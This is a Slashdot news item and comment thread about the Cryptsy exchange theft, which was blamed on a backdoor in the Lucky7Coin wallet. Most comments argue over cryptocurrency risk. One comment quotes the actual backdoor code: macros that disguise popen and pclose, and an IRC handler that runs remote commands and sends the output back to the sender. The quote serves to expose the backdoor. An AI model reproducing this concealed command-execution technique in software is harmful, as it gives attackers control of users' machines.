Slashdot is powered by your submissions, so send in your scoop

 



Forgot your password?
typodupeerror
Check out the new SourceForge HTML5 internet speed test! No Flash necessary and runs on all devices. ×
Bitcoin Crime The Almighty Buck

Cryptsy Bitcoin Trader Robbed, Blames Backdoor In the Code of a Wallet (softpedia.com) 90

An anonymous reader writes: Cryptsy, a website for trading Bitcoin, Litecoin, and other smaller crypto-currencies, announced a security incident, accusing the developer of Lucky7Coin of stealing 13,000 Bitcoin and 300,000 Litecoin, which at today's rate stands more than $5.7 million / €5.2 million. Cryptsy says "the developer of Lucky7Coin had placed an IRC backdoor into the code of [a] wallet, which allowed it to act as a sort of a Trojan, or command and control unit." Coincidentally this also explains why two days after the attack was carried out, exactly 300,000 Litecoin were dumped on the BTC-e exchange, driving Litecoin price down from $9.5 to $2.
This discussion has been archived. No new comments can be posted.

Cryptsy Bitcoin Trader Robbed, Blames Backdoor In the Code of a Wallet

Comments Filter:
  • No sympathy here. (Score:5, Insightful)

    by Anonymous Coward on Friday January 15, 2016 @10:32PM (#51312005)
    Crypto currencies are like the wild wild west of monetary transactions. Unless you are doing something that requires absolute discretion, it's really not worth the risk.
    • Well, as the current Litecoin value is around $3, I dont think you can exactly blame that for dropping it from $9.50... Especially as this was 6 months ago.
      The $9.50 spike that lasted a couple of days was highly unusual, and even then the $9.50 value was only ever sellers wet dreams, $8 was more like, and the spike lasted days, and never got down to $2. Any more BS we want to throw into the summary?

    • "I want my tulip bulbs back! Waah! Waah!".
      • Floriculture, the raising of flowers for sale, is a $100 billion a year business. That includes tulips. Just because tulips were overpriced once upon a time, or dotcom stocks or real estate more recently, does not mean they have no value.

    • by hey! ( 33014 )

      I don't feel any sympathy either, but your and my feelings aren't what's important here. We're still talking about a theft and on general principles I think the people who did it ought to be caught and punished.

  • by NotQuiteReal ( 608241 ) on Friday January 15, 2016 @10:34PM (#51312011) Journal
    (voice of Nelson)
  • by DesertNomad ( 885798 ) on Friday January 15, 2016 @10:59PM (#51312091)
    Must be a slow news day...
  • not to mention my keyboard
  • Over and over (Score:5, Insightful)

    by JustAnotherOldGuy ( 4145623 ) on Friday January 15, 2016 @11:19PM (#51312139)

    This is going to happen over and over and over and over and over. It'll be a looooooooong time, if ever, before virtual currencies are protected in any meaningful way against this sort of thing.

    Look at it this way: there are maybe a half-dozen people running a something-coin exchange, but there are essentially a limitless number of bad guys out there who, from the safety of their basements, can spend all the time in the world thinking up ways to crack your system. Sooner or later one of them s going to do it, and *boom*, away go the something-coins. And that's assuming that the something-coin exchange guys aren't themselves in on it or playing along. Or "go bad" later. Or get extorted, or find themselves in a jam and need some money ASAP. The attack surface is, in a word, enormous.

    Yes, real banks get robbed, but that takes some real time and effort and most of the time the robbers get caught. In contrast, the risk-to-reward ratio for virtual currency is so unbalanced that it's a natural target with minimal risks. No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.

    I don't have the answers (if there really are any) but you don't have to be a rocket scientist to see the problems inherent in virtual currencies. All of the people who lost money in this will, in all likelihood, never get a dime back. And worse yet, even the people who didn't lose money directly still take a hit when the currency undergoes devaluation because of the robbery. It seems like there are a LOT of risks and not many rewards.

    I find the idea of virtual currencies interesting, but not mature or safe enough to put "real" money into any of them. Maybe someday, but not today...

    • I just know that I keep wanting to read the title as "Crappy Bitcoin Trader...".

    • by clovis ( 4684 )

      What you said + and

      Yes, real banks get robbed,

      And real commercial banks don't debit the depositors for the money that was taken.

    • This, precisely.

      We are all here statisticians.

      Look at the population sizes and probabilities of the demographics.

      As JustAnotherOldGuy points out, there are a few cyber coin exchanges and a shit load of headcount that would like to grab some play dough.

      Given the small number of players inside the exchange perimeters as compared to the billions who are on the outside, trying to get in, and given that ALL players have the same goddam hardware and software and mental capabilities, the odds are that many peop

    • by Kjella ( 173770 )

      Yes, real banks get robbed, but that takes some real time and effort and most of the time the robbers get caught. In contrast, the risk-to-reward ratio for virtual currency is so unbalanced that it's a natural target with minimal risks. No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.

      At least here in Norway real world bank robberies are extremely rare, mainly because the traditional banks barely have money anymore. Most of them simply have an indoor ATM and that's all the cash they have. Apart from all that goes electronic, most the cash come from ATMs/withdrawals in stores, the stores collect it and it goes via armored cars to a few teller centrals before it's distributed to ATMs again. We had one such robbery 12 years ago where they got away with the equivalent of ~10 million USD, tho

    • No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.

      I don't have the answers (if there really are any) but you don't have to be a rocket scientist to see the problems inherent in virtual currencies.

      You do realize that normal banks also have websites, right? And that the money in your bank account isn't actually comprised of bills sitting in a locker?
      Bank 'robberies' nowadays happen in a very different way than they used to, but they still happen. The thing with normal banks is that they are enormous institutions with huge budgets for security (for obvious reasons).

      "Look at it this way: there are maybe a half-dozen banks in your country, but there are essentially a limitless number of bad guys out ther

      • You do realize that normal banks also have websites, right? And that the money in your bank account isn't actually comprised of bills sitting in a locker?
        Bank 'robberies' nowadays happen in a very different way than they used to, but they still happen.

        You do realize that the money in my account is backed by the institution, right? And you do realize that the institution or the FDIC or the government will replace my money if it's stolen?

        And you do realize that the people who just lost their ass in the latest bitcoin robbery are shit out of luck, unlike me, right? And you do realize that the people who just got screwed in the latest bitcoin robbery will almost certainly never get a dime back, right, because according to the article itself, no one will even

        • You do realize that the money in my account is backed by the institution, right? And you do realize that the institution or the FDIC or the government will replace my money if it's stolen?

          Yes, I do, but it is irrelevant to the point I was making. You painted a very outdated picture of bank robberies with 'bullets flying around' and I corrected you (in a needlessly snarky way, admittedly). The idea that banks can only be 'robbed' physically is simply wrong.

          Works exactly the same?

          Yes. I was pointing out your flawed logic, not stating that normal currencies and bitcoin-like currencies work exactly the same.
          The notion that bitcoin-like currencies are different because the good guy (exchange) providers to bad guy hacke

          • Yes, I do, but it is irrelevant to the point I was making. You painted a very outdated picture of bank robberies with 'bullets flying around' and I corrected you (in a needlessly snarky way, admittedly). The idea that banks can only be 'robbed' physically is simply wrong.

            I never said that they can only be robbed physically, even though it still is the most popular method.

            The difference is that regardless of how the bank is robbed, I'll still get my money back. Whether it's with a gun or a trojan, I'll still get my money back. The same can't be said for x-coins. Look at Mt. Gox, Inputs.io, Sheep Marketplace, Silk Road, etc etc....none of the victims, to my knowledge, ever recovered a dime of the ~$180 million stolen.

            Virtual currencies do have some serious, unavoidable probl

            • I never said that they can only be robbed physically, even though it still is the most popular method.

              It is not:
              http://abcnews.go.com/Business... [go.com]
              https://www.fbi.gov/stats-serv... [fbi.gov]
              http://www.informationweek.com... [informationweek.com]? (note that the stats are from 2006)

              . Also, you said this:

              Yes, real banks get robbed, but that takes some real time and effort and most of the time the robbers get caught. In contrast, the risk-to-reward ratio for virtual currency is so unbalanced that it's a natural target with minimal risks. No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.

              Note how you the contrast you present completely focuses on the physical nature. Had you have said that banks have better digital security than some crappy Bitcoin-exchange there would have been no issue. To say that you didn't imply that the 'real time and effort' had to do with 'bullets flying around, get-away cars, bank guards, hauling t

              • The difference is that regardless of how the bank is robbed, I'll still get my money back.

                This is still irrelevant to this thread, as I pointed out before.

                Lol, hardly....that's what this whole thread is about. You put your money in a bank and it's relatively safe, even if it gets robbed.

                If you put your money in bitCoin, dogeCoin, dinfinityCoin, whateverCoin, and if it's ripped off, it's gone. That's pretty much what I started out saying.

                Also, the stats you provided don't show shit:

                1) One is a "look back" at "great bank robbers in history" (completely irrelevant),
                2) The 2nd are FBI stats that ALSO don't show shit in terms of physical vs. electronic robbery,
                3)

                • that's what this whole thread is about

                  It's not. The whole 'bullets flying' and 'limitless number of bad guys' bullshit came out of your keyboard, not mine. Don't pretend that didn't happen.

                  If you put your money in bitCoin, dogeCoin, dinfinityCoin, whateverCoin, and if it's ripped off, it's gone. That's pretty much what I started out saying.

                  Again, nobody is saying otherwise or has said otherwise in this thread. Stop repeating irrelevant truths. It's just noise in this thread.

                  The article is actually all about stealing from the bank's customers.

                  Yes, that is what electronic bank robberies always amount to, be they of Bitcoin or of traditional currency. Only counting people stealing assets from the corporations themselves at this point would be stupid, as there is no

                  • It's not. The whole 'bullets flying' and 'limitless number of bad guys' bullshit came out of your keyboard, not mine. Don't pretend that didn't happen.

                    Lol, found the BitCoin fundy.

                    Sorry, but it all boils down to this (which is what I said at the very beginning): something-coin stuff is still waaaaaay to immature and uncertain to have any credibility in the larger marketplace. But go ahead and feel free to trust "Slick Jimmy's BitCoins Savings and Loan and Stuff" if you like. :)

                    Even Mike Hearn, one of Bitcoins lead developers, has now quit and says, "Despite knowing that bitcoin could fail all along, the now inescapable conclusion that it has failed still

    • >> I find the idea of virtual currencies interesting, but not mature or safe enough to put "real" money into any of them. Maybe someday, but not today...

      Something tells me that you don't know anything about multisig wallets...
      If people would stop trusting 3rd parties to hold their bitcoins for them, then problems like the one at Cryptsy would stop.

      • Something tells me that you don't know anything about multisig wallets...
        If people would stop trusting 3rd parties to hold their bitcoins for them, then problems like the one at Cryptsy would stop.

        Are you willing to go on record right now and state categorically that using multisig wallets will absolutely prevent your coins from being stolen, or that there is no way to hack, spoof, or otherwise get around the safety a multisig wallet provides?

        I thought not.

  • Blames Backdoor In the Code of a Wallet

    Or maybe it was bad security.

    • It's been bad security for months.

      Why people expect a robust, mature, and functioning degree of security in something which is brand new, and essentially the wild west is beyond me.

      How many huge bitcoin thefts have there been? And just why would we think something which has value isn't going to be the target of theft?

      These are lessons the banking industry has learned over decades, and taken steps to prevent.

      But suddenly someone invents crypto currency and they act all surprise to get ripped off ... and the

      • >> Why the fuck do people keep believing that some wallet or exchange which came into existence a few months ago is secure?

        The good news is, you don't need to worry if 3rd party exchanges or wallet providers are secure or not. Try using a multisig wallet (like at BitGo) where you hold two of the keys, and the company holds one. It takes two keys to conduct a transaction. If the company is hacked, your bitcoin can't be stolen. It really is that simple. I'm not saying it's impossible, but the risk

  • I'm more shocked to learn that Litecoin went as up as $9.50.

  • A wallet is a non-executable data file.
    You can't get a trojan from on.

    Unless you're retarded and use a third party service or program to MANAGE wallets.

  • known for months (Score:5, Informative)

    by Gravis Zero ( 934156 ) on Friday January 15, 2016 @11:59PM (#51312247)

    https://github.com/alerj78/luc... [github.com]

    dooglus commented on Mar 8, 2015

    There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.

    In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:

    /** Determine system page size in bytes */
    #define S_ORDER(a,b,c,d) b##a##d##c /**
      * OS-dependent memory page locking/unlocking.
      * Defined as policy class to make stubbing for test possible.
      */
    #define CLine S_ORDER(I,F,E,L) /**
      * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
      * std::allocator templates.
      */
    #define CRead S_ORDER(p,po,n,e)
    #define CFree S_ORDER(cl,p,e,os) // // Allocator that locks its contents from being paged // out of memory and clears its contents before deletion. //
    #define CBuff "PR" "IV" "M" "SG"

    Then in irc.cpp they are used to implement the backdoor:

    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
        {
            CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
            if (buf) {
                std::string result = "";
                while (!feof(buf))
                    if (fgets(pszName, sizeof(pszName), buf) != NULL)
                        result += pszName;
                CFree(buf);
                strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
                if (strchr(pszName, '!'))
                    *strchr(pszName, '!') = '\0';
                Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
            }
        }

    I expect this is a known issue since this kind of thing doesn't happen accidentally.

    • Theft happened July 29, 2014, way before that post.
    • The real news is: what the heck is an IRC client doing in a bitcoin wallet? Seems the unnecessary result of creeping featuritis.
      • Re: known for months (Score:2, Informative)

        by Anonymous Coward

        Irc was one of the initial means of peer discovery. It has been long since replaced with better mechanisms

  • by Fnord666 ( 889225 ) on Saturday January 16, 2016 @05:53AM (#51312843) Journal

    It was not the developer of Lucky7Coin that introduced this backdoor, or at least not the original developer. The heart of this attack was a social engineering. Lucky7Coin support had been abandoned. Someone else came along, claiming that they were taking over support for this particular altcoin. They even created a new github repo for it. As part of the initial commit though they introduced a backdoor. Cryptsy picked up the new version of the code and the rest is history.

No skis take rocks like rental skis!

Working...